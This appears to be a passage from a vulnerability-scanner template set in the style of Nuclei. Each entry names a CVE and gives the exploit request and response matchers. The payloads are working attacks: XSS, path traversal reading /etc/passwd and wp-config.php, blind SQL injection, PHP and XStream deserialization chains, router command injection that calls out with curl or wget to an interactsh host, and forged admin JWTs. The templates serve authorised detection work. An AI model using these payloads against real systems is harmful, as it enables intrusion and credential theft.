Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3897","info":{"name":"Bonita BPM Portal <6.5.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd","{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0:"]}]}]},{"id":"CVE-2015-4414","info":{"name":"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1635","info":{"name":"Microsoft Windows 'HTTP.sys' - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Range":"bytes=0-18446744073709551615"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HTTP Error 416","The requested range is not satisfiable"],"condition":"and"},{"type":"word","part":"header","words":["Microsoft"]}]}]},{"id":"CVE-2015-9480","info":{"name":"WordPress RobotCPA 5 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2166","info":{"name":"Ericsson Drutt MSDP - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-8399","info":{"name":"Atlassian Confluence <5.8.17 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["confluence-init.properties","View Default Decorator"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-8562","info":{"name":"Joomla HTTP Header Unauthenticated - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"Joomla\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: 123}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";s:37:\"phpinfo();JFactory::getConfig();exit;\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}\ud834\udf06\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2996","info":{"name":"SysAid Help Desk <15.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd","{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9323","info":{"name":"404 to 301 <= 2.0.2 - Authenticated Blind SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/admin.php?page=i4t3-logs&orderby=(SELECT+*+FROM+(SELECT+SLEEP(7))XXX)--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"404-to-301\")"],"condition":"and"}]}]},{"id":"CVE-2015-8349","info":{"name":"SourceBans <2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2196","info":{"name":"WordPress Spider Calendar <=1.4.9 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout 10s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(body, \"{\\\"status\\\":true,\\\"data\\\"\")"],"condition":"and"}]}]},{"id":"CVE-2015-2863","info":{"name":"Kaseya Virtual System Administrator - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/inc/supportLoad.asp?urlToLoad=http://oast.me","{{BaseURL}}/vsaPres/Web20/core/LocalProxy.ashx?url=http://oast.me"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-9414","info":{"name":"WordPress Symposium <=15.8.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wp-symposium/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WP Symposium","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-0554","info":{"name":"ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlsecurity.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var wpapskkey","var WscDevPin","var sessionkey"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1579","info":{"name":"WordPress Slider Revolution - Local File Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php","{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'DB_NAME'","'DB_PASSWORD'","'DB_USER'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-6477","info":{"name":"Nordex NC2  - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login"],"body":"connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27{{randstr}}%27%29%3C%2Fscript%3E&pw=nordex&language=en","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["</script><script>alert('{{randstr}}')</script>"]}]}]},{"id":"CVE-2015-1880","info":{"name":"Fortinet FortiOS <=5.2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('{{randstr}}')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4127","info":{"name":"WordPress Church Admin <0.810 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/church-admin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Church Admin ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4632","info":{"name":"Koha 3.20.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7780","info":{"name":"ManageEngine Firewall Analyzer <8.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2755","info":{"name":"WordPress AB Google Map Travel <=3.4 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nPOST /wp-admin/admin.php?page=ab_map_options HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlat=%22%3E+%3Cscript%3E%2B-%2B-1-%2B-%2Balert%28document.domain%29%3C%2Fscript%3E&long=76.26730&lang=en&map_width=500&map_height=300&zoom=7&day_less_five_fare=2&day_more_five_fare=1.5&less_five_fare=3&more_five_fare=2.5&curr_format=%24&submit=Update+Settings\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>+-+-1-+-+alert(document.domain)</script>\")","contains(body_2, \"ab-google-map-travel\")"],"condition":"and"}]}]},{"id":"CVE-2015-5471","info":{"name":"Swim Team <= v1.44.10777 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5688","info":{"name":"Geddy <13.0.8 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3224","info":{"name":"Ruby on Rails Web Console - Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{randstr}}"],"headers":{"X-Forwarded-For":"::1"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Rails.root:","Action Controller: Exception caught"],"condition":"and"},{"type":"word","part":"response","words":["X-Web-Console-Session-Id","data-remote-path=","data-session-id="],"case-insensitive":true,"condition":"or"}]}]},{"id":"CVE-2015-7823","info":{"name":"Kentico CMS 8.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2015-2807","info":{"name":"Navis DocumentCloud <0.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/navis-documentcloud/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Navis","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7297","info":{"name":"Joomla! Core SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2004-0519","info":{"name":"SquirrelMail 1.4.x - Folder Name Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2004-1965","info":{"name":"Open Bulletin Board (OpenBB) v1.0.6 - Open Redirect/XSS","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?redirect=http%3A%2F%2Fwww.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-20150","info":{"name":"Trendnet AC2600 TEW-827DRU - Credentials Disclosure","severity":"medium"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\naction=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ftp_username","ftp_password","ftp_permission","TEW-827DRU"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"password","group":1,"regex":["<input name=\"admin_passwd\" type=\"password\" id=\"admin_passwd\" size=\"20\" maxlength=\"15\" value =\"(.*)\" />"],"part":"body"}]}]},{"id":"CVE-2021-21345","info":{"name":"XStream <1.4.16  - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\n        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\n          <packet>\n            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\n              <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>\n                <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>\n                  <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>\n                    <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>\n                      <jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType>\n                      <uriProperties/>\n                      <attributeProperties/>\n                      <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>\n                        <getter>\n                          <class>com.sun.corba.se.impl.activation.ServerTableEntry</class>\n                          <name>verify</name>\n                          <parameter-types/>\n                        </getter>\n                      </inheritedAttWildcard>\n                    </bi>\n                    <tagName/>\n                    <context>\n                      <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>\n                        <outer-class reference='../..'/>\n                      </marshallerPool>\n                      <nameList>\n                        <nsUriCannotBeDefaulted>\n                          <boolean>true</boolean>\n                        </nsUriCannotBeDefaulted>\n                        <namespaceURIs>\n                          <string>1</string>\n                        </namespaceURIs>\n                        <localNames>\n                          <string>UTF-8</string>\n                        </localNames>\n                      </nameList>\n                    </context>\n                  </bridge>\n                </bridge>\n                <jaxbObject class='com.sun.corba.se.impl.activation.ServerTableEntry'>\n                  <activationCmd>curl http://{{interactsh-url}}</activationCmd>\n                </jaxbObject>\n              </dataSource>\n            </message>\n            <satellites/>\n            <invocationProperties/>\n          </packet>\n        </indexMap>\n      </comparator>\n    </default>\n    <int>3</int>\n    <string>javax.xml.ws.binding.attachments.inbound</string>\n    <string>javax.xml.ws.binding.attachments.inbound</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-24340","info":{"name":"WordPress Statistics <13.0.8 - Blind SQL Injection","severity":"high"},"requests":[{"raw":["GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 15s\nGET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"WP Statistics\")"],"condition":"and"},{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 500","contains(body_2, \">WordPress &rsaquo; Error<\") && contains(body_2, \">Your request is not valid.<\")"],"condition":"and"}]}]},{"id":"CVE-2021-26292","info":{"name":"AfterLogic Aurora and WebMail Pro < 7.7.9 - Full Path Disclosure","severity":"low"},"requests":[{"raw":["DELETE /dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["caldav_public_user","GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-29442","info":{"name":"Nacos <1.4.1 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["\"TABLENAME\":\"(?:(?:(?:(?:(?:APP_CONFIGDATA_RELATION_[PS]UB|SYS(?:(?:CONGLOMERAT|ALIAS|(?:FI|RO)L)E|(?:(?:ROUTINE)?|COL)PERM|(?:FOREIGN)?KEY|CONSTRAINT|T(?:ABLEPERM|RIGGER)|S(?:TAT(?:EMENT|ISTIC)|EQUENCE|CHEMA)|DEPEND|CHECK|VIEW|USER)|USER|ROLE)S|CONFIG_(?:TAGS_RELATION|INFO_(?:AGGR|BETA|TAG))|TENANT_CAPACITY|GROUP_CAPACITY|PERMISSIONS|SYSCOLUMNS|SYS(?:DUMMY1|TABLES)|APP_LIST)|CONFIG_INFO)|TENANT_INFO)|HIS_CONFIG_INFO)\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31755","info":{"name":"Tenda Router AC11 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /goform/setmac HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/index.htmlr\nContent-Type: application/x-www-form-urlencoded\n\nmodule1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-20137","info":{"name":"Gryphon Tower - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/luci/site_access/?url=%22%20onfocus=alert(document.domain)%20autofocus=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["onfocus=alert(document.domain) autofocus=1>","Send Access Request URL"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44910","info":{"name":"SpringBlade - Information Leakage","severity":"high"},"requests":[{"raw":["GET /api/blade-user/user-list HTTP/1.1\nHost: {{Hostname}}\nBlade-Auth: bearer {{bearer}}\n"],"payloads":{"bearer":["eyJhbGciOiJIUzM4NCIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODIxNzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.gbUWSdFfmzfU_gKzFYjyyJzcrHBfOwswJvptowNwNwfo12QilWudTMg-LbDAOPwk","eyJhbGciOiJIUzM4NCIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODIxNzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.gbUWSdFfmzfU_gKzFYjyyJzcrHBfOwswJvptowNwNwfo12QilWudTMg-LbDAOPwk","eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODIxNzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.kol9scDVwLDE8U3mM_j8O4UYrpdUc9_Zw935g7Nb979DfRuanai1UeKsK2zCKuR77Otryi0sGzBfGANDbLseBg"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"account\":","\"password\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24862","info":{"name":"WordPress RegistrationMagic <5.0.1.6 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/custom-registration-form-builder-with-submission-manager/admin/js/script_rm_utilities.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_3, \"rm_user_role_mananger_form\")"],"condition":"and"}]}]},{"id":"CVE-2021-38751","info":{"name":"ExponentCMS <= 2.6 - Host Header Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Host":"{{randstr}}.tld"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{randstr}}.tld","EXPONENT.PATH","EXPONENT.URL"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26086","info":{"name":"Atlassian Jira Limited -  Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42566","info":{"name":"myfactory FMS  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45092","info":{"name":"Thinfinity Iframe Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/lab.html?vpath=//interact.sh"],"matchers":[{"type":"regex","regex":[".*vpath.*","thinfinity"],"condition":"and"}]}]},{"id":"CVE-2021-40960","info":{"name":"Galera WebTemplate 1.0 Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41192","info":{"name":"Redash Setup Configuration - Default Secrets 